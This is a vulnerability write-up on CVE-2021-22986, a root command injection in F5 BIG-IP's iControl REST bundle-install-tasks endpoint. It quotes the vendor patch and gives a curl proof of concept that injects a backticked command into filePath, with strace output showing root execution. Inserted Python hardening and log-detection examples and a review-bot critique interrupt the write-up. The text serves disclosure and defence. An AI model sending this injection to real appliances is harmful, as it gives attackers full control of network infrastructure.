
CVE-2021-22986 F5 BIG-IP/BIG-IQ RCE

2021-03-17 16:32



This vulnerability allows an unauthenticated attacker with network access to the iControl REST interface, through the BIG-IP management interface and self IP addresses, to execute arbitrary system commands, create or delete files, and disable services. It can only be exploited through the control plane, not through the data plane. Exploitation may result in complete system compromise. BIG-IP systems in Appliance mode are also vulnerable.



CVE-2021-22986


From patch analysis and testing, this vulnerability appears to involve some form of authentication bypass or even SSRF. The full-context patch below has had its line numbers adjusted for use in a debugger.


RCE


This is a post-authentication root command injection in the tar(1) command.

Patch


A filter is applied to the user-controlled taskState.filePath parameter.
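To make the filter concrete, the following Python is an added example (not F5's code): it transcribes the validFilePathChars allow-list from the patch below, shows the pre-patch shell-string construction that the restjavad log later reproduces verbatim, and contrasts it with the argv-vector and quoted forms that keep metacharacters inert. The assumption that the original executor hands the string to a shell is drawn from the "> /dev/null" redirect and from the strace output further down; the function names are illustrative.

```python
import re
import shlex

# Allow-list regex from the F5 patch (validFilePathChars), transcribed from
# Java to Python syntax. Java's matches() is a whole-string match, so
# fullmatch() is used below.
VALID_FILE_PATH_CHARS = re.compile(
    r"(^[a-zA-Z][a-zA-Z0-9_.\-\s()]*)\.([tT][aA][rR]\.[gG][zZ])$"
)


def bundle_filename(file_path: str) -> str:
    """Mirror of the patch: keep only the part after the last '/'."""
    return file_path[file_path.rfind("/") + 1:]


def validate_bundle_filename(file_path: str) -> bool:
    """True when the basename of file_path passes the patch's allow-list.
    Note that, as in the patch, directory components are not inspected."""
    return VALID_FILE_PATH_CHARS.fullmatch(bundle_filename(file_path)) is not None


def build_extract_command_unsafe(file_path: str) -> str:
    """Pre-patch shape: user input concatenated into a shell command string.
    Returned for inspection only; this example never executes it."""
    return "tar -xf " + file_path + " -O > /dev/null"


def build_extract_argv(file_path: str) -> list:
    """Hardened shape (assumed design, not F5's): an argv vector handed to the
    process without a shell, e.g. subprocess.run(argv, shell=False).
    Backticks, semicolons and spaces stay inside one argument."""
    return ["tar", "-xf", file_path, "-O"]


def build_extract_command_quoted(file_path: str) -> str:
    """If a shell string is unavoidable (the /dev/null redirect needs one),
    quote the argument so metacharacters are passed literally."""
    return "tar -xf " + shlex.quote(file_path) + " -O > /dev/null"


def extract_plan(file_path: str) -> dict:
    """Validate first, then describe how the input would be executed."""
    if not validate_bundle_filename(file_path):
        return {"accepted": False, "argv": None}
    return {"accepted": True, "argv": build_extract_argv(file_path)}


if __name__ == "__main__":
    # Constructed inputs: the page's payload, a legitimate pack path, and a
    # name that passes the regex but contains whitespace.
    for p in ["`id`", "/var/apm/f5-iappslx-agc-usecase-pack/pack.tar.gz",
              "My Pack (v1).tar.gz"]:
        print(repr(p), extract_plan(p))
        print("   unsafe string:", build_extract_command_unsafe(p))
        print("   quoted string:", build_extract_command_quoted(p))
```

The regex rejects the page's payload, but it still admits whitespace and round brackets; in a concatenated shell string those split or group words, which is why the argv form (or quoting) is the durable fix rather than the allow-list alone.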

[snip]+  private static final Pattern validFilePathChars = Pattern.compile("(^[a-zA-Z][a-zA-Z0-9_.\\-\\s()]*)\\.([tT][aA][rR]\\.[gG][zZ])$");[snip]   private void validateGzipBundle(final IAppBundleInstallTaskState taskState) {     if (Utilities.isNullOrEmpty(taskState.filePath)) {       File agcUseCasePackDir = new File("/var/apm/f5-iappslx-agc-usecase-pack/");       if (!agcUseCasePackDir.exists() || !agcUseCasePackDir.isDirectory()) {         String error = "Access Guided Configuration use case pack not found on BIG-IP. Please upload and install the pack.";         failTask(taskState, error, "");         return;       }       File[] agcUseCasePack = agcUseCasePackDir.listFiles();       if (agcUseCasePack == null || agcUseCasePack.length == 0 || !agcUseCasePack[0].isFile()) {
String error = "Access Guided Configuration use case pack not found on BIG-IP. Please upload and install the pack."; failTask(taskState, error, ""); return; } taskState.filePath = agcUseCasePack[0].getPath(); }
+ String filename = taskState.filePath.substring(taskState.filePath.lastIndexOf('/') + 1);+ Matcher m = validFilePathChars.matcher(filename);+ if (!m.matches()) {+ String errorMessage = String.format("Access Guided Configuration use case pack validation failed: the file name %s must begin with alphabet, and only contain letters, numbers, spaces and/or special characters (underscore (_), period (.), hyphen (-) and round brackets ()). Only a .tar.gz file is allowed", new Object[] { filename });++++ failTask(taskState, errorMessage, "");++ return;+ } final String extractTarCommand = "tar -xf " + taskState.filePath + " -O > /dev/null";

ShellExecutor extractTar = new ShellExecutor(extractTarCommand);
CompletionHandler<ShellExecutionResult> executionFinishedHandler = new CompletionHandler<ShellExecutionResult>() { public void completed(ShellExecutionResult extractQueryResult) { if (extractQueryResult.getExitStatus().intValue() != 0) { String error = extractTarCommand + " failed with exit code=" + extractQueryResult.getExitStatus();

IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, "Usecase pack validation failed. Please ensure that usecase pack is a valid tar archive.", error + "stdout + stderr=" + extractQueryResult.getOutput());

return; }

taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.QUERY_INSTALLED_RPM; IAppBundleInstallTaskCollectionWorker.this.sendStatusUpdate(taskState); }

public void failed(Exception ex, ShellExecutionResult rpmQueryResult) { IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, "Usecase pack validation failed. Please ensure that usecase pack is a valid tar archive.", String.format("%s failed", new Object[] { this.val$extractTarCommand }) + RestHelper.throwableStackToString(ex)); } };


extractTar.startExecution(executionFinishedHandler); }[snip]
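Review bot: the added validation covers only the basename (`String filename = taskState.filePath.substring(taskState.filePath.lastIndexOf('/') + 1);` is what `validFilePathChars.matcher(filename)` sees), yet the unchanged line right after it still concatenates the whole path into a shell string (`"tar -xf " + taskState.filePath + " -O > /dev/null"`), so directory components of taskState.filePath are never checked, and the whitespace and round brackets the regex admits in the filename remain shell-significant in that string. Suggest passing the path to ShellExecutor as a discrete argument rather than as part of a command string, or constraining taskState.filePath to the /var/apm/f5-iappslx-agc-usecase-pack/ directory before the command is built, and adding a test that a filename containing a space is handed to tar as a single argument.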


PoC


The affected endpoint is /mgmt/tm/access/bundle-install-tasks.

wvu@kharak:~$ curl -ksu admin:[redacted] https://192.168.123.134/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"`id`"}' | jq .
{
  "filePath": "`id`",
  "toBeInstalledAppRpmsIndex": -1,
  "id": "36671f83-d1be-4f5a-a2e6-7f9442a2a76f",
  "status": "CREATED",
  "userReference": {
    "link": "https://localhost/mgmt/shared/authz/users/admin"
  },
  "identityReferences": [
    {
      "link": "https://localhost/mgmt/shared/authz/users/admin"
    }
  ],
  "ownerMachineId": "ac2562f0-e41f-4652-ba35-6a2b804b235e",
  "generation": 1,
  "lastUpdateMicros": 1615930477819656,
  "kind": "tm:access:bundle-install-tasks:iappbundleinstalltaskstate",
  "selfLink": "https://localhost/mgmt/tm/access/bundle-install-tasks/36671f83-d1be-4f5a-a2e6-7f9442a2a76f"
}
wvu@kharak:~$


The id(1) command executes as root:

[pid 64748] execve("/bin/tar", ["tar", "-xf", "uid=0(root)", "gid=0(root)", "groups=0(root)", "context=system_u:system_r:initrc_t:s0", "-O"], [/* 9 vars */]) = 0


An error may appear in /var/log/restjavad.0.log:

[SEVERE][10029][16 Mar 2021 21:34:37 UTC][8100/tm/access/bundle-install-tasks IAppBundleInstallTaskCollectionWorker] Usecase pack validation failed. Please ensure that usecase pack is a valid tar archive. error details: tar -xf `id` -O > /dev/null failed
org.apache.commons.exec.ExecuteException: Process exited with an error: 2 (Exit value: 2)
  at org.apache.commons.exec.DefaultExecutor.executeInternal(DefaultExecutor.java:404)
  at org.apache.commons.exec.DefaultExecutor.access$200(DefaultExecutor.java:48)
  at org.apache.commons.exec.DefaultExecutor$1.run(DefaultExecutor.java:200)
  at java.lang.Thread.run(Thread.java:748)
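That log entry is a useful detection source, because the bundle-install worker echoes the exact tar command, including the attacker-controlled filePath, into restjavad.0.log. The Python below is an added example (not part of the original write-up or of F5's tooling) that parses lines in this format and flags bundle-install-tasks failures whose filePath contains shell metacharacters or fails the patch's allow-list. The sample log lines are constructed to match the entry above; the line format assumed is the bracketed level/sequence/timestamp/context prefix seen there.

```python
import re

# Constructed sample restjavad.0.log content modelled on the entry quoted in
# the write-up: a benign message, the injection attempt, and an ordinary
# corrupt archive that should not be flagged.
SAMPLE_LOG = (
    "[INFO][10001][16 Mar 2021 21:30:00 UTC][8100/tm/access/bundle-install-tasks "
    "IAppBundleInstallTaskCollectionWorker] Usecase pack installed\n"
    "[SEVERE][10029][16 Mar 2021 21:34:37 UTC][8100/tm/access/bundle-install-tasks "
    "IAppBundleInstallTaskCollectionWorker] Usecase pack validation failed. Please ensure "
    "that usecase pack is a valid tar archive. error details: tar -xf `id` -O > /dev/null failed\n"
    "org.apache.commons.exec.ExecuteException: Process exited with an error: 2 (Exit value: 2)\n"
    "  at org.apache.commons.exec.DefaultExecutor.executeInternal(DefaultExecutor.java:404)\n"
    "[SEVERE][10030][16 Mar 2021 21:35:02 UTC][8100/tm/access/bundle-install-tasks "
    "IAppBundleInstallTaskCollectionWorker] Usecase pack validation failed. Please ensure "
    "that usecase pack is a valid tar archive. error details: tar -xf "
    "/var/apm/f5-iappslx-agc-usecase-pack/broken.tar.gz -O > /dev/null failed\n"
    "org.apache.commons.exec.ExecuteException: Process exited with an error: 2 (Exit value: 2)\n"
)

# Bracketed prefix: [LEVEL][seq][timestamp][context] message
LOG_LINE = re.compile(
    r"^\[(?P<level>[A-Z]+)\]\[(?P<seq>\d+)\]\[(?P<ts>[^\]]+)\]\[(?P<ctx>[^\]]+)\] (?P<msg>.*)$"
)
# The worker echoes its command verbatim; pull the filePath back out of it.
TAR_CMD = re.compile(r"error details: tar -xf (?P<path>.*?) -O > /dev/null failed")
# Characters the patch's allow-list can never admit and a shell would act on.
SHELL_META = re.compile(r"[`$;|&<>]")
# Same allow-list as the patch (validFilePathChars), applied to the basename.
ALLOWED_NAME = re.compile(r"[a-zA-Z][a-zA-Z0-9_.\-\s()]*\.[tT][aA][rR]\.[gG][zZ]")


def classify_path(path: str):
    """Return a reason string if path looks hostile, else None."""
    if SHELL_META.search(path):
        return "shell metacharacters in filePath"
    basename = path[path.rfind("/") + 1:]
    if not ALLOWED_NAME.fullmatch(basename):
        return "filePath fails patch allow-list"
    return None


def find_suspicious_bundle_tasks(log_text: str) -> list:
    """Scan restjavad-style log text; return one record per suspicious
    bundle-install-tasks failure (timestamp, sequence, path, reason)."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m or "bundle-install-tasks" not in m.group("ctx"):
            continue  # stack-trace continuation lines and other workers
        cmd = TAR_CMD.search(m.group("msg"))
        if not cmd:
            continue
        reason = classify_path(cmd.group("path"))
        if reason:
            hits.append({"ts": m.group("ts"), "seq": m.group("seq"),
                         "path": cmd.group("path"), "reason": reason})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_bundle_tasks(SAMPLE_LOG):
        print(f"{hit['ts']} seq={hit['seq']} {hit['reason']}: {hit['path']!r}")
```

Because the command fails with exit status 2 whether or not the injected command ran, the SEVERE entry is written on both successful and unsuccessful injection attempts; correlating it with the strace-style execve evidence above, or with an audit trail of POSTs to the bundle-install-tasks endpoint, confirms actual execution.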



RCE update


Rich Warren has produced a full RCE chain using SSRF.


References:

https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986



Source: https://mp.weixin.qq.com/s?__biz=MzAwMjQ2NTQ4Mg==&mid=2247485905&idx=1&sn=a8b4e79fa4d6acae6477c4eaef655870
